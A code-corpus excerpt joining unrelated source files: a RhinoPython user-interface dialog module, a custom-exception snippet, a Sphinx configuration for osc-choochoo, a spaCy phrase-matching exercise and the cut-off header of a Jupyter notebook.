] | no_license | matpapava/rhinopython | ad5aed71bba4c5554b8654f48a8c8054feb80c31 | 05a425c9df6f88ba857f68bb757daf698f0843c6 | refs/heads/master | 2021-05-29T12:34:34.788458 | 2015-06-08T11:58:43 | 2015-06-08T11:58:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,341 | py | import Rhino
import utility as rhutil
import scriptcontext
import System.Drawing.Color
import System.Enum
import System.Array
import System.Windows.Forms
import math
from view import __viewhelper
def BrowseForFolder(folder=None, message=None, title=None):
"""Display browse-for-folder dialog allowing the user to select a folder
Parameters:
folder[opt] = a default folder
message[opt] = a prompt or message
title[opt] = a dialog box title
Returns:
selected folder
None on error
"""
dlg = System.Windows.Forms.FolderBrowserDialog()
if folder:
if not isinstance(folder, str): folder = str(folder)
dlg.SelectedPath = folder
if message:
if not isinstance(message, str): message = str(message)
dlg.Description = message
if dlg.ShowDialog()==System.Windows.Forms.DialogResult.OK:
return dlg.SelectedPath
def CheckListBox(items, message=None, title=None):
"""Displays a list of items in a checkable-style list dialog box
Parameters:
items = a list of tuples containing a string and a boolean check state
message[opt] = a prompt or message
title[opt] = a dialog box title
Returns:
A list of tuples containing the input string in items along with their
new boolean check value
None on error
"""
checkstates = [item[1] for item in items]
itemstrs = [str(item[0]) for item in items]
newcheckstates = Rhino.UI.Dialogs.ShowCheckListBox(title, message, itemstrs, checkstates)
if newcheckstates:
rc = zip(itemstrs, newcheckstates)
return rc
return scriptcontext.errorhandler()
def ComboListBox(items, message=None, title=None):
"""Displays a list of items in a combo-style list box dialog.
Parameters:
items = a list of string
message[opt] = a prompt of message
title[opt] = a dialog box title
Returns:
The selected item if successful
None if not successful or on error
"""
return Rhino.UI.Dialogs.ShowComboListBox(title, message, items)
def EditBox(default_string=None, message=None, title=None):
"""Display dialog box prompting the user to enter a string value. The
string value may span multiple lines
"""
rc, text = Rhino.UI.Dialogs.ShowEditBox(title, message, default_string, True)
return text
def GetAngle(point=None, reference_point=None, default_angle_degrees=0, message=None):
"""Pause for user input of an angle
Parameters:
point(opt) = starting, or base point
reference_point(opt) = if specified, the reference angle is calculated
from it and the base point
default_angle_degrees(opt) = a default angle value specified
message(opt) = a prompt to display
Returns:
angle in degree if successful, None on error
"""
point = rhutil.coerce3dpoint(point)
if not point: point = Rhino.Geometry.Point3d.Unset
reference_point = rhutil.coerce3dpoint(reference_point)
if not reference_point: reference_point = Rhino.Geometry.Point3d.Unset
default_angle = math.radians(default_angle_degrees)
rc, angle = Rhino.Input.RhinoGet.GetAngle(message, point, reference_point, default_angle)
if rc==Rhino.Commands.Result.Success: return math.degrees(angle)
def GetBoolean(message, items, defaults):
"""Pauses for user input of one or more boolean values. Boolean values are
displayed as click-able command line option toggles
Parameters:
message = a prompt
items = list or tuple of options. Each option is a tuple of three strings
element 1 = description of the boolean value. Must only consist of letters
and numbers. (no characters like space, period, or dash
element 2 = string identifying the false value
element 3 = string identifying the true value
defaults = list of boolean values used as default or starting values
Returns:
a list of values that represent the boolean values if successful
None on error
"""
go = Rhino.Input.Custom.GetOption()
go.AcceptNothing(True)
go.SetCommandPrompt( message )
if type(defaults) is list or type(defaults) is tuple: pass
else: defaults = [defaults]
# special case for single list. Wrap items into a list
if len(items)==3 and len(defaults)==1: items = [items]
count = len(items)
if count<1 or count!=len(defaults): return scriptcontext.errorhandler()
toggles = []
for i in range(count):
initial = defaults[i]
item = items[i]
offVal = item[1]
t = Rhino.Input.Custom.OptionToggle( initial, item[1], item[2] )
toggles.append(t)
go.AddOptionToggle(item[0], t)
while True:
getrc = go.Get()
if getrc==Rhino.Input.GetResult.Option: continue
if getrc!=Rhino.Input.GetResult.Nothing: return None
break
return [t.CurrentValue for t in toggles]
def GetBox(mode=0, base_point=None, prompt1=None, prompt2=None, prompt3=None):
"""Pauses for user input of a box
Parameters:
mode[opt] = The box selection mode.
0 = All modes
1 = Corner. The base rectangle is created by picking two corner points
2 = 3-Point. The base rectangle is created by picking three points
3 = Vertical. The base vertical rectangle is created by picking three points.
4 = Center. The base rectangle is created by picking a center point and a corner point
base_point[opt] = optional 3D base point
prompt1, prompt2, prompt3 [opt] = optional prompts to set
Returns:
list of eight Point3d that define the corners of the box on success
None is not successful, or on error
"""
base_point = rhutil.coerce3dpoint(base_point)
if base_point is None: base_point = Rhino.Geometry.Point3d.Unset
rc, box = Rhino.Input.RhinoGet.GetBox(mode, base_point, prompt1, prompt2, prompt3)
if rc==Rhino.Commands.Result.Success: return tuple(box.GetCorners())
def GetColor(color=[0,0,0]):
"""Display the Rhino color picker dialog allowing the user to select an RGB color
Parameters:
color [opt] = default RGB value. If omitted, the default color is black
Returns:
RGB tuple of three numbers on success
None on error
"""
color = rhutil.coercecolor(color)
if color is None: color = System.Drawing.Color.Black
rc, color = Rhino.UI.Dialogs.ShowColorDialog(color)
if rc: return color.R, color.G, color.B
return scriptcontext.errorhandler()
def GetCursorPos():
"""Retrieves the cursor's position
Returns: tuple containing the following information
cursor position in world coordinates
cursor position in screen coordinates
id of the active viewport
cursor position in client coordinates
"""
view = scriptcontext.doc.Views.ActiveView
screen_pt = Rhino.UI.MouseCursor.Location
client_pt = view.ScreenToClient(screen_pt)
viewport = view.ActiveViewport
xf = viewport.GetTransform(Rhino.DocObjects.CoordinateSystem.Screen, Rhino.DocObjects.CoordinateSystem.World)
world_pt = Rhino.Geometry.Point3d(client_pt.X, client_pt.Y, 0)
world_pt.Transform(xf)
return world_pt, screen_pt, viewport.Id, client_pt
def GetEdgeCurves(message=None, min_count=1, max_count=0, select=False):
"""Prompt the user to pick one or more surface or polysurface edge curves
Parameters:
message [optional] = A prompt or message.
min_count [optional] = minimum number of edges to select.
max_count [optional] = maximum number of edges to select.
select [optional] = Select the duplicated edge curves.
Returns:
List of (curve id, parent id, selection point)
None if not successful
"""
if min_count<0 or (max_count>0 and min_count>max_count): return
if not message: message = "Select Edges"
go = Rhino.Input.Custom.GetObject()
go.SetCommandPrompt(message)
go.GeometryFilter = Rhino.DocObjects.ObjectType.Curve
go.GeometryAttributeFilter = Rhino.Input.Custom.GeometryAttributeFilter.EdgeCurve
go.EnablePreSelect(False, True)
rc = go.GetMultiple(min_count, max_count)
if rc!=Rhino.Input.GetResult.Object: return
rc = []
for i in range(go.ObjectCount):
edge = go.Object(i).Edge()
if not edge: continue
edge = edge.Duplicate()
curve_id = scriptcontext.doc.Objects.AddCurve(edge)
parent_id = go.Object(i).ObjectId
pt = go.Object(i).SelectionPoint()
rc.append( (curve_id, parent_id, pt) )
if select:
for item in rc:
rhobj = scriptcontext.doc.Objects.Find(item[0])
rhobj.Select(True)
scriptcontext.doc.Views.Redraw()
return rc
def GetInteger(message=None, number=None, minimum=None, maximum=None):
"""Pauses for user input of a whole number.
Parameters:
message [optional] = A prompt or message.
number [optional] = A default whole number value.
minimum [optional] = A minimum allowable value.
maximum [optional] = A maximum allowable value.
Returns:
The whole number input by the user if successful.
None if not successful, or on error
"""
gi = Rhino.Input.Custom.GetInteger()
if message: gi.SetCommandPrompt(message)
if number is not None: gi.SetDefaultInteger(number)
if minimum is not None: gi.SetLowerLimit(minimum, False)
if maximum is not None: gi.SetUpperLimit(maximum, False)
if gi.Get()!=Rhino.Input.GetResult.Number: return scriptcontext.errorhandler()
rc = gi.Number()
gi.Dispose()
return rc
def GetLayer(title="Select Layer", layer=None, show_new_button=False, show_set_current=False):
"""Displays dialog box prompting the user to select a layer
Parameters:
title[opt] = dialog box title
layer[opt] = name of a layer to preselect. If omitted, the current layer will be preselected
show_new_button, show_set_current[opt] = Optional buttons to show on the dialog
Returns:
name of selected layer if successful
None on error
"""
layer_index = scriptcontext.doc.Layers.CurrentLayerIndex
if layer:
index = scriptcontext.doc.Layers.Find(layer, True)
if index!=-1: layer_index = index
rc = Rhino.UI.Dialogs.ShowSelectLayerDialog(layer_index, title, show_new_button, show_set_current, True)
if rc[0]!=System.Windows.Forms.DialogResult.OK: return None
layer = scriptcontext.doc.Layers[rc[1]]
return layer.FullPath
def GetLayers(title="Select Layers", show_new_button=False):
"""Displays a dialog box prompting the user to select one or more layers
Parameters:
title[opt] = dialog box title
show_new_button[opt] = Optional button to show on the dialog
Returns:
The names of selected layers if successful
"""
rc, layer_indices = Rhino.UI.Dialogs.ShowSelectMultipleLayersDialog(None, title, show_new_button)
if rc==System.Windows.Forms.DialogResult.OK:
return [scriptcontext.doc.Layers[index].FullPath for index in layer_indices]
def GetLine(mode=0, point=None, message1=None, message2=None, message3=None):
"""Prompts the user to pick points that define a line
Parameters:
mode[opt] = line definition mode. See help file for details
point[opt] = optional starting point
message1, message2, message3 = optional prompts
Returns:
Tuple of two points on success
None on error
"""
gl = Rhino.Input.Custom.GetLine()
if mode==0: gl.EnableAllVariations(True)
else: gl.GetLineMode = System.Enum.ToObject( Rhino.Input.Custom.GetLineMode, mode-1 )
if point:
point = rhutil.coerce3dpoint(point)
gl.SetFirstPoint(point)
if message1: gl.FirstPointPrompt = message1
if message2: gl.MidPointPrompt = message2
if message3: gl.SecondPointPromp = message3
rc, line = gl.Get()
if rc==Rhino.Commands.Result.Success: return line.From, line.To
def GetMeshFaces(object_id, message="", min_count=1, max_count=0):
"""Prompts the user to pick one or more mesh faces
Parameters:
object_id = the mesh object's identifier
message[opt] = a prompt of message
min_count[opt] = the minimum number of faces to select
max_count[opt] = the maximum number of faces to select. If 0, the user must
press enter to finish selection. If -1, selection stops as soon as there
are at least min_count faces selected.
Returns:
list of mesh face indices on success
None on error
"""
scriptcontext.doc.Objects.UnselectAll()
scriptcontext.doc.Views.Redraw()
object_id = rhutil.coerceguid(object_id, True)
def FilterById( rhino_object, geometry, component_index ):
return object_id == rhino_object.Id
go = Rhino.Input.Custom.GetObject()
go.SetCustomGeometryFilter(FilterById)
if message: go.SetCommandPrompt(message)
go.GeometryFilter = Rhino.DocObjects.ObjectType.MeshFace
go.AcceptNothing(True)
if go.GetMultiple(min_count,max_count)!=Rhino.Input.GetResult.Object: return None
objrefs = go.Objects()
rc = [item.GeometryComponentIndex.Index for item in objrefs]
go.Dispose()
return rc
def GetMeshVertices(object_id, message="", min_count=1, max_count=0):
"""Prompts the user to pick one or more mesh vertices
Parameters:
object_id = the mesh object's identifier
message[opt] = a prompt of message
min_count[opt] = the minimum number of vertices to select
max_count[opt] = the maximum number of vertices to select. If 0, the user must
press enter to finish selection. If -1, selection stops as soon as there
are at least min_count vertices selected.
Returns:
list of mesh vertex indices on success
None on error
"""
scriptcontext.doc.Objects.UnselectAll()
scriptcontext.doc.Views.Redraw()
object_id = rhutil.coerceguid(object_id, True)
class CustomGetObject(Rhino.Input.Custom.GetObject):
def CustomGeometryFilter( self, rhino_object, geometry, component_index ):
return object_id == rhino_object.Id
go = CustomGetObject()
if message: go.SetCommandPrompt(message)
go.GeometryFilter = Rhino.DocObjects.ObjectType.MeshVertex
go.AcceptNothing(True)
if go.GetMultiple(min_count,max_count)!=Rhino.Input.GetResult.Object: return None
objrefs = go.Objects()
rc = [item.GeometryComponentIndex.Index for item in objrefs]
go.Dispose()
return rc
def GetPoint(message=None, base_point=None, distance=None, in_plane=False):
"""Pauses for user input of a point.
Parameters:
message [opt] = A prompt or message.
base_point [opt] = list of 3 numbers or Point3d identifying a starting, or base point
distance [opt] = constraining distance. If distance is specified, basePoint must also
be sepcified.
in_plane [opt] = constrains the point selections to the active construction plane.
Returns:
point on success
None if no point picked or user canceled
"""
gp = Rhino.Input.Custom.GetPoint()
if message: gp.SetCommandPrompt(message)
base_point = rhutil.coerce3dpoint(base_point)
if base_point:
gp.DrawLineFromPoint(base_point,True)
gp.EnableDrawLineFromPoint(True)
if distance: gp.ConstrainDistanceFromBasePoint(distance)
if in_plane: gp.ConstrainToConstructionPlane(True)
gp.Get()
if gp.CommandResult()!=Rhino.Commands.Result.Success:
return scriptcontext.errorhandler()
pt = gp.Point()
gp.Dispose()
return pt
def GetPointOnCurve(curve_id, message=None):
"""Pauses for user input of a point constrainted to a curve object
Parameters:
curve_id = identifier of the curve to get a point on
message [opt] = a prompt of message
Returns:
3d point if successful
None on error
"""
curve = rhutil.coercecurve(curve_id, -1, True)
gp = Rhino.Input.Custom.GetPoint()
if message: gp.SetCommandPrompt(message)
gp.Constrain(curve, False)
gp.Get()
if gp.CommandResult()!=Rhino.Commands.Result.Success:
return scriptcontext.errorhandler()
pt = gp.Point()
gp.Dispose()
return pt
def GetPointOnMesh(mesh_id, message=None):
"""Pauses for user input of a point constrained to a mesh object
Parameters:
mesh_id = identifier of the mesh to get a point on
message [opt] = a prompt or message
Returns:
3d point if successful
None on error
"""
mesh_id = rhutil.coerceguid(mesh_id, True)
if not message: message = "Point"
cmdrc, point = Rhino.Input.RhinoGet.GetPointOnMesh(mesh_id, message, False)
if cmdrc==Rhino.Commands.Result.Success: return point
def GetPointOnSurface(surface_id, message=None):
"""Pauses for user input of a point constrained to a surface or polysurface
object
Parameters:
surface_id = identifier of the surface to get a point on
message [opt] = a prompt or message
Returns:
3d point if successful
None on error
"""
surfOrBrep = rhutil.coercesurface(surface_id)
if not surfOrBrep:
surfOrBrep = rhutil.coercebrep(surface_id, True)
gp = Rhino.Input.Custom.GetPoint()
if message: gp.SetCommandPrompt(message)
if isinstance(surfOrBrep,Rhino.Geometry.Surface):
gp.Constrain(surfOrBrep,False)
else:
gp.Constrain(surfOrBrep, -1, -1, False)
gp.Get()
if gp.CommandResult()!=Rhino.Commands.Result.Success:
return scriptcontext.errorhandler()
pt = gp.Point()
gp.Dispose()
return pt
def GetPoints(draw_lines=False, in_plane=False, message1=None, message2=None, max_points=None, base_point=None):
"""Pauses for user input of one or more points
Parameters:
draw_lines [opt] = Draw lines between points
in_plane[opt] = Constrain point selection to the active construction plane
message1[opt] = A prompt or message for the first point
message2[opt] = A prompt or message for the next points
max_points[opt] = maximum number of points to pick. If not specified, an
unlimited number of points can be picked.
base_point[opt] = a starting or base point
Returns:
list of 3d points if successful
None if not successful or on error
"""
gp = Rhino.Input.Custom.GetPoint()
if message1: gp.SetCommandPrompt(message1)
gp.EnableDrawLineFromPoint( draw_lines )
if in_plane:
gp.ConstrainToConstructionPlane(True)
plane = scriptcontext.doc.Views.ActiveView.ActiveViewport.ConstructionPlane()
gp.Constrain(plane, False)
getres = gp.Get()
if gp.CommandResult()!=Rhino.Commands.Result.Success: return None
prevPoint = gp.Point()
rc = [prevPoint]
if max_points is None or max_points>1:
current_point = 1
if message2: gp.SetCommandPrompt(message2)
def GetPointDynamicDrawFunc( sender, args ):
if len(rc)>1:
c = Rhino.ApplicationSettings.AppearanceSettings.FeedbackColor
args.Display.DrawPolyline(rc, c)
if draw_lines: gp.DynamicDraw += GetPointDynamicDrawFunc
while True:
if max_points and current_point>=max_points: break
if draw_lines: gp.DrawLineFromPoint(prevPoint, True)
gp.SetBasePoint(prevPoint, True)
current_point += 1
getres = gp.Get()
if getres==Rhino.Input.GetResult.Cancel: break
if gp.CommandResult()!=Rhino.Commands.Result.Success: return None
prevPoint = gp.Point()
rc.append(prevPoint)
return rc
def GetReal(message="Number", number=None, minimum=None, maximum=None):
"""Pauses for user input of a number.
Parameters:
message [optional] = A prompt or message.
number [optional] = A default number value.
minimum [optional] = A minimum allowable value.
maximum [optional] = A maximum allowable value.
Returns:
The number input by the user if successful.
None if not successful, or on error
"""
gn = Rhino.Input.Custom.GetNumber()
if message: gn.SetCommandPrompt(message)
if number is not None: gn.SetDefaultNumber(number)
if minimum is not None: gn.SetLowerLimit(minimum, False)
if maximum is not None: gn.SetUpperLimit(maximum, False)
if gn.Get()!=Rhino.Input.GetResult.Number: return None
rc = gn.Number()
gn.Dispose()
return rc
def GetRectangle(mode=0, base_point=None, prompt1=None, prompt2=None, prompt3=None):
"""Pauses for user input of a rectangle
Parameters:
mode[opt] = The rectangle selection mode. The modes are as follows
0 = All modes
1 = Corner - a rectangle is created by picking two corner points
2 = 3Point - a rectangle is created by picking three points
3 = Vertical - a vertical rectangle is created by picking three points
4 = Center - a rectangle is created by picking a center point and a corner point
base_point[opt] = a 3d base point
prompt1, prompt2, prompt3 = optional prompts
Returns:
a tuple of four 3d points that define the corners of the rectangle
None on error
"""
mode = System.Enum.ToObject( Rhino.Input.GetBoxMode, mode )
base_point = rhutil.coerce3dpoint(base_point)
if( base_point==None ): base_point = Rhino.Geometry.Point3d.Unset
prompts = ["", "", ""]
if prompt1: prompts[0] = prompt1
if prompt2: prompts[1] = prompt2
if prompt3: prompts[2] = prompt3
rc, corners = Rhino.Input.RhinoGet.GetRectangle(mode, base_point, prompts)
if rc==Rhino.Commands.Result.Success: return corners
return None
def GetString(message=None, defaultString=None, strings=None):
"""Pauses for user input of a string value
Parameters:
message [opt]: a prompt or message
defaultString [opt]: a default value
strings [opt]: list of strings to be displayed as a click-able command options.
Note, strings cannot begin with a numeric character
"""
gs = Rhino.Input.Custom.GetString()
gs.AcceptNothing(True)
if message: gs.SetCommandPrompt(message)
if defaultString: gs.SetDefaultString(defaultString)
if strings:
for s in strings: gs.AddOption(s)
result = gs.Get()
if result==Rhino.Input.GetResult.Cancel: return None
if( result == Rhino.Input.GetResult.Option ):
return gs.Option().EnglishName
return gs.StringResult()
def ListBox(items, message=None, title=None, default=None):
"""Display a list of items in a list box dialog.
Parameters:
items = a list
message [opt] = a prompt of message
title [opt] = a dialog box title
default [opt] = selected item in the list
Returns:
The selected item if successful
None if not successful or on error
"""
return Rhino.UI.Dialogs.ShowListBox(title, message, items, default)
def MessageBox(message, buttons=0, title=""):
"""Displays a message box. A message box contains a message and
title, plus any combination of predefined icons and push buttons.
Parameters:
message = A prompt or message.
buttons[opt] = buttons and icon to display. Can be a combination of the
following flags. If omitted, an OK button and no icon is displayed
0 Display OK button only.
1 Display OK and Cancel buttons.
2 Display Abort, Retry, and Ignore buttons.
3 Display Yes, No, and Cancel buttons.
4 Display Yes and No buttons.
5 Display Retry and Cancel buttons.
16 Display Critical Message icon.
32 Display Warning Query icon.
48 Display Warning Message icon.
64 Display Information Message icon.
0 First button is the default.
256 Second button is the default.
512 Third button is the default.
768 Fourth button is the default.
0 Application modal. The user must respond to the message box
before continuing work in the current application.
4096 System modal. The user must respond to the message box
before continuing work in any application.
title[opt] = the dialog box title
Returns:
A number indicating which button was clicked:
1 OK button was clicked.
2 Cancel button was clicked.
3 Abort button was clicked.
4 Retry button was clicked.
5 Ignore button was clicked.
6 Yes button was clicked.
7 No button was clicked.
"""
buttontype = buttons & 0x00000007 #111 in binary
btn = System.Windows.Forms.MessageBoxButtons.OK
if buttontype==1: btn = System.Windows.Forms.MessageBoxButtons.OKCancel
elif buttontype==2: btn = System.Windows.Forms.MessageBoxButtons.AbortRetryIgnore
elif buttontype==3: btn = System.Windows.Forms.MessageBoxButtons.YesNoCancel
elif buttontype==4: btn = System.Windows.Forms.MessageBoxButtons.YesNo
elif buttontype==5: btn = System.Windows.Forms.MessageBoxButtons.RetryCancel
icontype = buttons & 0x00000070
icon = System.Windows.Forms.MessageBoxIcon.None
if icontype==16: icon = System.Windows.Forms.MessageBoxIcon.Error
elif icontype==32: icon = System.Windows.Forms.MessageBoxIcon.Question
elif icontype==48: icon = System.Windows.Forms.MessageBoxIcon.Warning
elif icontype==64: icon = System.Windows.Forms.MessageBoxIcon.Information
defbtntype = buttons & 0x00000300
defbtn = System.Windows.Forms.MessageBoxDefaultButton.Button1
if defbtntype==256:
defbtn = System.Windows.Forms.MessageBoxDefaultButton.Button2
elif defbtntype==512:
defbtn = System.Windows.Forms.MessageBoxDefaultButton.Button3
if not isinstance(message, str): message = str(message)
dlg_result = Rhino.UI.Dialogs.ShowMessageBox(message, title, btn, icon, defbtn)
if dlg_result==System.Windows.Forms.DialogResult.OK: return 1
if dlg_result==System.Windows.Forms.DialogResult.Cancel: return 2
if dlg_result==System.Windows.Forms.DialogResult.Abort: return 3
if dlg_result==System.Windows.Forms.DialogResult.Retry: return 4
if dlg_result==System.Windows.Forms.DialogResult.Ignore: return 5
if dlg_result==System.Windows.Forms.DialogResult.Yes: return 6
if dlg_result==System.Windows.Forms.DialogResult.No: return 7
def PropertyListBox(items, values, message=None, title=None):
"""Displays list of items and their values in a property-style list box dialog
Parameters:
items, values = list of string items and their corresponding values
message [opt] = a prompt or message
title [opt] = a dialog box title
Returns:
a list of new values on success
None on error
"""
values = [str(v) for v in values]
return Rhino.UI.Dialogs.ShowPropertyListBox(title, message, items, values)
def OpenFileName(title=None, filter=None, folder=None, filename=None, extension=None):
"""Displays file open dialog box allowing the user to enter a file name.
Note, this function does not open the file.
Parameters:
title[opt] = A dialog box title.
filter[opt] = A filter string. The filter must be in the following form:
"Description1|Filter1|Description2|Filter2||", where "||" terminates filter string.
If omitted, the filter (*.*) is used.
folder[opt] = A default folder.
filename[opt] = a default file name
extension[opt] = a default file extension
Returns:
the file name is successful
None if not successful, or on error
"""
fd = Rhino.UI.OpenFileDialog()
if title: fd.Title = title
if filter: fd.Filter = filter
if folder: fd.InitialDirectory = folder
if filename: fd.FileName = filename
if extension: fd.DefaultExt = extension
if fd.ShowDialog()==System.Windows.Forms.DialogResult.OK: return fd.FileName
def OpenFileNames(title=None, filter=None, folder=None, filename=None, extension=None):
"""Displays file open dialog box allowing the user to select one or more file names.
Note, this function does not open the file.
Parameters:
title[opt] = A dialog box title.
filter[opt] = A filter string. The filter must be in the following form:
"Description1|Filter1|Description2|Filter2||", where "||" terminates filter string.
If omitted, the filter (*.*) is used.
folder[opt] = A default folder.
filename[opt] = a default file name
extension[opt] = a default file extension
Returns:
list of selected file names
"""
fd = Rhino.UI.OpenFileDialog()
if title: fd.Title = title
if filter: fd.Filter = filter
if folder: fd.InitialDirectory = folder
if filename: fd.FileName = filename
if extension: fd.DefaultExt = extension
fd.MultiSelect = True
rc = []
if fd.ShowDialog()==System.Windows.Forms.DialogResult.OK: rc = fd.FileNames
return rc
def PopupMenu(items, modes=None, point=None, view=None):
"""Displays a user defined, context-style popup menu. The popup menu can appear
almost anywhere, and it can be dismissed by either clicking the left or right
mouse buttons
Parameters:
items = list of strings representing the menu items. An empty string or None
will create a separator
modes[opt] = List of numbers identifying the display modes. If omitted, all
modes are enabled.
0 = menu item is enabled
1 = menu item is disabled
2 = menu item is checked
3 = menu item is disabled and checked
point[opt] = a 3D point where the menu item will appear. If omitted, the menu
will appear at the current cursor position
view[opt] = if point is specified, the view in which the point is computed.
If omitted, the active view is used
Returns:
index of the menu item picked or -1 if no menu item was picked
"""
screen_point = System.Windows.Forms.Cursor.Position
if point:
point = rhutil.coerce3dpoint(point)
view = __viewhelper(view)
viewport = view.ActiveViewport
point2d = viewport.WorldToClient(point)
screen_point = viewport.ClientToScreen(point2d)
return Rhino.UI.Dialogs.ShowContextMenu(items, screen_point, modes);
def RealBox(message="", default_number=None, title="", minimum=None, maximum=None):
"""Display a dialog box prompting the user to enter a number
Returns:
number on success
None on error
"""
if default_number is None: default_number = Rhino.RhinoMath.UnsetValue
if minimum is None: minimum = Rhino.RhinoMath.UnsetValue
if maximum is None: maximum = Rhino.RhinoMath.UnsetValue
rc, number = Rhino.UI.Dialogs.ShowNumberBox(title, message, default_number, minimum, maximum)
if rc==System.Windows.Forms.DialogResult.OK: return number
def SaveFileName(title=None, filter=None, folder=None, filename=None, extension=None):
"""Display a save dialog box allowing the user to enter a file name.
Note, this function does not save the file.
Parameters:
title[opt] = A dialog box title.
filter[opt] = A filter string. The filter must be in the following form:
"Description1|Filter1|Description2|Filter2||", where "||" terminates filter string.
If omitted, the filter (*.*) is used.
folder[opt] = A default folder.
filename[opt] = a default file name
extension[opt] = a default file extension
Returns:
the file name is successful
None if not successful, or on error
"""
fd = Rhino.UI.SaveFileDialog()
if title: fd.Title = title
if filter: fd.Filter = filter
if folder: fd.InitialDirectory = folder
if filename: fd.FileName = filename
if extension: fd.DefaultExt = extension
if fd.ShowDialog()==System.Windows.Forms.DialogResult.OK: return fd.FileName
def StringBox(message=None, default_value=None, title=None):
"Display a dialog box prompting the user to enter a string value."
rc, text = Rhino.UI.Dialogs.ShowEditBox(title, message, default_value, False)
if rc!=System.Windows.Forms.DialogResult.OK: return None
return text
| [
"[email protected]"
] | |
6f2277101164e2fd6dac195e12949d3dca920dbe | 8fe9b8de265a1cf408dba15605e0e0c33a6931ee | /exceptions/define_exception.py | 1d94201250896bf695a200143de0ae758dc6c69c | [] | no_license | clivejan/python_object_oriented | d07346a2589fb630b2fd65d23ff2997c7e194b5d | 8f1ef1925630962c474b143607c056e8c2a1d7af | refs/heads/master | 2020-12-10T02:46:42.815508 | 2020-01-19T18:53:26 | 2020-01-19T18:53:26 | 233,484,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py | class InvalidWithdrawal(Exception):
pass
raise InvalidWithdrawal("Wake up! You don't have $50 in your account.")
| [
"[email protected]"
] | |
2f320639bf0c7b231d588ce8050002ed8d7f888e | eb52ecd946dc6c2e4d7bd63a27bbfbc587ccbe79 | /doc/source/conf.py | 7da23a679516396f631dd434f1640595a4a9aab4 | [
"Apache-2.0"
] | permissive | dtroyer/osc-choochoo | 5ee7b124b7c53c44aac5651dde950e11778e1653 | 57119ab84528933da9cbcd57dcd4f5b842a58186 | refs/heads/master | 2021-09-08T00:06:58.580823 | 2018-03-03T19:20:07 | 2018-03-03T19:36:37 | 103,709,841 | 1 | 1 | Apache-2.0 | 2018-03-03T13:28:05 | 2017-09-15T23:34:08 | Python | UTF-8 | Python | false | false | 2,903 | py | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import pbr.version
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'openstackdocstheme',
'stevedore.sphinxext',
'cliff.sphinxext',
]
# openstackdocstheme options
repository_name = 'dtroyer/osc-choochoo'
bug_project = ''
bug_tag = ''
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'osc-choochoo'
copyright = u'2017 Dean Troyer'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None} | [
"[email protected]"
] | |
eeca7667162158e4c128fc7a5beedc8e432f8d53 | 4882e66d296cb0e5dab21de1170e13f8c54a6c9c | /Exercicios/2-ex7.py | 0e2b488de4c6e268228bb55c516ec4f10b0faca2 | [] | no_license | felipemanfrin/NLP | d6eac822fc919f93a1146c004540f62fe9c83086 | 45424ca49504d5f11e13f8d97829a0d5a9926bc2 | refs/heads/master | 2023-01-21T12:16:56.081979 | 2020-12-02T21:20:30 | 2020-12-02T21:20:30 | 268,633,901 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 581 | py | import spacy
from spacy.matcher import Matcher
from spacy.matcher import PhraseMatcher
nlp = spacy.load('en_core_web_sm')
matcher = PhraseMatcher(nlp.vocab)
pattern = ['swimming vigorously']
phrase_patterns = [nlp(text) for text in pattern]
matcher.add('SwimmingVigorously', None, *phrase_patterns)
with open('../UPDATED_NLP_COURSE/TextFiles/owlcreek.txt') as f:
doc = nlp(f.read())
found_matches = matcher(doc)
for match_id, start, end in found_matches:
string_id = nlp.vocab[match_id]
span = doc[start+10:end+10]
print(match_id, string_id, start, end, span.text) | [
"[email protected]"
] | |
57af349162a6ec2e90c73196d07d293ccd657ef7 | e97c5e5beb22444b7eabd743a35493ab6fd4cb2f | /nbs/15_gsa_gls/20-null_simulations/20_gls_phenoplier/profiling/py/01_03-gls-profiling-new_code.py | 419a1aae91420228e40cf2683fc7fa6979628e86 | [
"BSD-2-Clause-Patent"
] | permissive | greenelab/phenoplier | bea7f62949a00564e41f73b361f20a08e2e77903 | b0e753415e098e93a1f206bb90b103a97456a96f | refs/heads/main | 2023-08-23T20:57:49.525441 | 2023-06-15T06:00:32 | 2023-06-22T16:12:37 | 273,271,013 | 5 | 2 | NOASSERTION | 2023-06-20T20:35:45 | 2020-06-18T15:13:58 | Jupyter Notebook | UTF-8 | Python | false | false | 1,943 | py | # ---
# jupyter:
# jupytext:
# cell_metadata_filter: all,-execution,-papermill,-trusted
# formats: ipynb,py//py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.8
# kernelspec:
